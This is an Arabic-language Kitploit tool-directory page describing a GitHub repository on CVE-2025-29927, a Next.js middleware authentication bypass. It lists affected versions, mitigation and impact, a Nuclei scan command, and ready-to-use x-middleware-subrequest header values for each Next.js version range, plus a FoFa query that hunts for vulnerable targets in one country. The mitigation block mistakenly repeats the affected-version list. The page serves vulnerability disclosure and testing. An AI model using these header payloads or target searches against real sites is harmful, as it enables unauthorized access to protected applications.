Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29927 — CVE-2025-29927: ثغرة تجاوز الوسيطة في Next.js | Kitploit
أدوات/GitHubGitHub/kh4sh3i/cve-2025-29927
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: ثغرة تجاوز الوسيطة في Next.js

عرض المستودع
24منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة



CVE-2025-29927

CVE-2025-29927: ثغرة تجاوز الوسيطة (Middleware) في Next.js يُظهر هذا المستودع ثغرة CVE-2025-29927 في Next.js حيث يمكن استخدام الرأس الداخلي x-middleware-subrequest لتجاوز فحوصات الوسيطة مثل المصادقة.

الإصدارات المتأثرة

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

التخفيف والإصلاح

  • قم بترقية Next.js إلى الإصدارات المصححة:
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • إذا لم يكن الترقية ممكنة فورًا، قم بحظر أو إزالة الرأس x-middleware-subrequest على مستوى خادم الويب أو الوكيل:

سيناريوهات التأثير

  • تجاوز التفويض (Authorization Bypass): يمكن للمهاجمين الوصول إلى المسارات المحمية دون مصادقة أو تفويض مناسب.
  • تجاوز سياسة أمان المحتوى (CSP Bypass): إذا تمت إضافة رؤوس CSP عبر الوسيطة، يمكن للمهاجمين تجاوز هذه الضوابط الأمنية، مما قد يتيح هجمات البرمجة النصية عبر المواقع (XSS).
  • رفض الخدمة عبر تسميم ذاكرة التخزين المؤقت (Denial of Service via Cache-Poisoning): في بعض التهيئات، يمكن للمهاجمين تسميم ذاكرة التخزين المؤقت بمحتوى غير مصرح به عن طريق تجاوز الوسيطة التي تعين رؤوس التحكم في التخزين المؤقت.

استخدام قالب Nuclei لـ nextjs-CVE-2025-29927

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

الاستغلال عبر إصدارات Next.js المختلفة

  • للإصدارات السابقة لـ 12.2:
root@kitploit:~
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • للإصدارات 12.2 وما بعدها:
root@kitploit:~
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • للإصدارات 13.2.0 وما بعدها:
root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

البحث عن الأهداف باستخدام FoFa

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

CTF مجاني لهذا

  • CTF
تنزيل الأداة